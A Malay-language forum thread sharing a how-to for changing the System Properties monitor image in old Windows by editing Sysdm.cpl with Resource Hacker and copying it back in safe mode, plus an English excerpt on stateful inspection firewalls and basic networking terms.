6. Nampak folder "1"? Ok, Expandkan dia lagi ke bawah... dan anda akan nampak nombor 1033, OK click nombor tu!
Jen Jen Jeng! Nampak tak Imej Monitor tu sekarang? Itulah yang anda nak tukar, OK sekarang ni pulak cara nak replace imej tu;
1. Pegi pada MENU "Action" kat reshack dan amik "Replace Bitmap".
2. Dia akan keluar satu kotak, dan anda klik "open file with new bitmap..." dan select bitmap yang anda nak replace tu
3. Click butang "Replace"
Dan anda akan tengok MENU sebelah kiri tang BITMAP tu akan "Collapsed" (naik ke atas balik dan tanda + tu keluar). Taraaa! Gambar TV tadi tu dah pun bertukar!
Belum siap lagi tu!... sekarang ni pulak! kena save, tapi jangan save terus, pilih SAVE AS, dan letak kat tempat lain, letak jauh jauh, dalam drive D: ke apa ke...

Nak buat benda ni jadi, restart PC anda dan masa dia nak boot ke harddisk, cepat-cepat tekan F8, dan pilih:
1. Command Prompt only untuk windows98 dan ME.
2. Pilih Save Mode with Command Prompt untuk windows2000 dan XP

Sebab? file Sysdm.cpl tu adalah salah satu dari Windows File Protection dan dia tak kasi fail tu direplace, diubah ketika windows tengah beroperasi. Sebab tu kena pegi Safe Mode.
Bila dah masuk dalam command prompt, Just taip command ni -> copy C:WindowsyoursystemSysdm.cpl C:WindowsyoursystemSysdm.bak
dimana yang ni gunanya sebagai backup, mana la tahukan yang anda dah modified tu tak jadi plak!
(NOTA: %yoursystem% tu samada anda punya folder system, SYSTEM atau SYSTEM32)
OK, sekarang ni proses nak replace file original kepada file yang anda dah tukar. Pada command prompt taip aje -> copy X:Sysdm.cpl C:WINDOWSyoursystem (NOTA: X tu anda punya drive lain, atau kalau anda save dalam C:My Documents, jadilah macamni -> copy "C:My DocumentsSysdm.cpl" C:Windowsyoursystem)

Siap!, Restart balik PC anda supaya dia boot macam biasa, dan check anda punya System Properties!
Selamat Mencuba!

[StRiDeR]

Hj.atokENSEM said:

.:: :: Mengenal System Properties Komputer :: ::.

Pernah melihat System Properties? Bukak Start -> Control Panel dan dalam tu ada System Properties, atau Right click ICON My Computer dan pilih Properties.
Perasan tak ada gambar macam Monitor/TV pada sudut atas sebelah kiri? Teringin nak menukarnya?


Biasanya orang akan tukar OEM logo pada bahagian bawah sebelah kiri (kalau anda punya tak ada,

just create satu gambar format BITMAP, dan save jadi oemlogo.bmp, dan simpan dalam SYSTEM folder anda, nanti gambar anda akan keluar.
Camana pulak nak tukar Gambar TV/Monitor kat System Properties tu?
Ok, sekarang ni apa-apa hal, sediakan satu imej dalam format bitmap terlebih dahulu (sama macam oemlogo.bmp tu pun boleh). Saya andaikan yang anda nak letak gambar yang sama seperti OEMINFO kat situ!
Kat dalam ni mesti ramai yang pernah dengar software Reshack atau Resource Hacker, betul? Siapa yang tak ada boleh download di SINI! Dan extract kan dia menjadi satu folder dan dah boleh guna, Click aje file ResHacker.exe tu. (Jangan bimbang, software ni VIRUS free... )

Kemudian cari fail Sysdm.cpl di dalam direktori C:WINDOWSSYSTEM kalau anda guna windows98, ME dan C:WINDOWSSYSTEM32 kalau ko guna windows 2000 dan XP. Search sahaja kalau susah sangat.
Bila dah jumpa;
1. Run Reshack.
2. Pergi menu FILE pada Reshack dan click OPEN
3. Cari fail sysdm.cpl dan open.
4. Sekarang ni anda akan nampak beberapa DIREKTORI di sebelah kiri pada Reshack tu, ada BITMAP, ICON, DIALOG dan sebagainya.
5. Click tanda + disebelah BITMAP tu (orang di UK panggil expand
6. Nampak folder "1"? Ok, Expandkan dia lagi ke bawah... dan anda akan nampak nombor 1033, OK click nombor tu!
Jen Jen Jeng! Nampak tak Imej Monitor tu sekarang? Itulah yang anda nak tukar, OK sekarang ni pulak cara nak replace imej tu;
1. Pegi pada MENU "Action" kat reshack dan amik "Replace Bitmap".
2. Dia akan keluar satu kotak, dan anda klik "open file with new bitmap..." dan select bitmap yang anda nak replace tu
3. Click butang "Replace"
Dan anda akan tengok MENU sebelah kiri tang BITMAP tu akan "Collapsed" (naik ke atas balik dan tanda + tu keluar). Taraaa! Gambar TV tadi tu dah pun bertukar!
Belum siap lagi tu!... sekarang ni pulak! kena save, tapi jangan save terus, pilih SAVE AS, dan letak kat tempat lain, letak jauh jauh, dalam drive D: ke apa ke...

Nak buat benda ni jadi, restart PC anda dan masa dia nak boot ke harddisk, cepat-cepat tekan F8, dan pilih:
1. Command Prompt only untuk windows98 dan ME.
2. Pilih Save Mode with Command Prompt untuk windows2000 dan XP

Sebab? file Sysdm.cpl tu adalah salah satu dari Windows File Protection dan dia tak kasi fail tu direplace, diubah ketika windows tengah beroperasi. Sebab tu kena pegi Safe Mode.
Bila dah masuk dalam command prompt, Just taip command ni -> copy C:WindowsyoursystemSysdm.cpl C:WindowsyoursystemSysdm.bak
dimana yang ni gunanya sebagai backup, mana la tahukan yang anda dah modified tu tak jadi plak!
(NOTA: %yoursystem% tu samada anda punya folder system, SYSTEM atau SYSTEM32)
OK, sekarang ni proses nak replace file original kepada file yang anda dah tukar. Pada command prompt taip aje -> copy X:Sysdm.cpl C:WINDOWSyoursystem (NOTA: X tu anda punya drive lain, atau kalau anda save dalam C:My Documents, jadilah macamni -> copy "C:My DocumentsSysdm.cpl" C:Windowsyoursystem)

Siap!, Restart balik PC anda supaya dia boot macam biasa, dan check anda punya System Properties!
Selamat Mencuba!

artikel nie dah ader dah tok...cuba atok tgk artikel atok yg atok dah post dalam page nie (page 14)...

[atokENSEM]

page 6 - Stateful inspection
-----------------------------------

Stateful inspection is a combination of packet filtering with some of the elements of the gateway methods. It is somewhat of a vague definition, unlike the other three. Essentially, it is a packet filter firewall that examines more than just the addresses and port information of the data. Without using proxies, it can imitate some of the features of an application gateway by viewing the application specific data sent in each packet.

There are a variety of different products available that use stateful inspection to varying degrees. The advantage of this method is that it can examine data at the application level (that is filtering by content, not just address) without the performance overhead added by using proxies. Stateful firewalls will also close all ports to unsolicited incoming data and keep a table of requests from inside the network, like the two gateway methods.

The firewall included with Microsoft Windows XP claims to be a stateful inspection firewall, though it lacks any way of filtering application content. This is where things get a little blurry, as the XP firewall has essentially the same functionality as the firewalls built into commonly available cable/DSL home routers, a combination of packet filtering with a circuit level gateway.

Apparently then, the definition of a stateful inspection firewall is one that combines features of the other three types to any degree.

Configuring your home firewall

Now let's look at setting up and configuring your own firewall to protect your computer or network.

What you'll need: Cable/DSL router with integrated firewall/NAT Or A software firewall such as zonealarm or blackICE defender. Or Windows XP Home or Professional. What you will need to know a few basic definitions. If you are already familiar with the terminology, please skip ahead to the next page.

Port: One end of a logical connection between two computers. Specific ports are used for specific types of data. For example port 80 is used to send and receive HTTP (web browser) traffic. Firewalls can block ports, disabling them from receiving any data.

Protocol : A standardized method for transmitting data between devices. HTTP, FTP and SMTP are examples of well-known protocols for web browsing, file transfer and email respectively. Used with IP addresses and Ports to transfer data between computers. Protocols come in two types, as far as this article is concerned, TCP and UDP.

TCP protocols form a connection, or session, between two computers to send and receive data. They include methods of ensuring data is delivered, and correcting errors. UDP protocols are considered 'connectionless.' They can pass information between computers, but no session is formed to govern the exchange, and no confirmation is given that the data has been received.

IP address: A number used by devices on the Internet or within local networks to address data. The format is xxx.xxx.xxx.xxx where xxx can be a number between 0-255. Example 192.168.5.2

[atokENSEM]

StRiDeR said:

artikel nie dah ader dah tok...cuba atok tgk artikel atok yg atok dah post dalam page nie (page 14)...

alamak...tak ingat lak plak..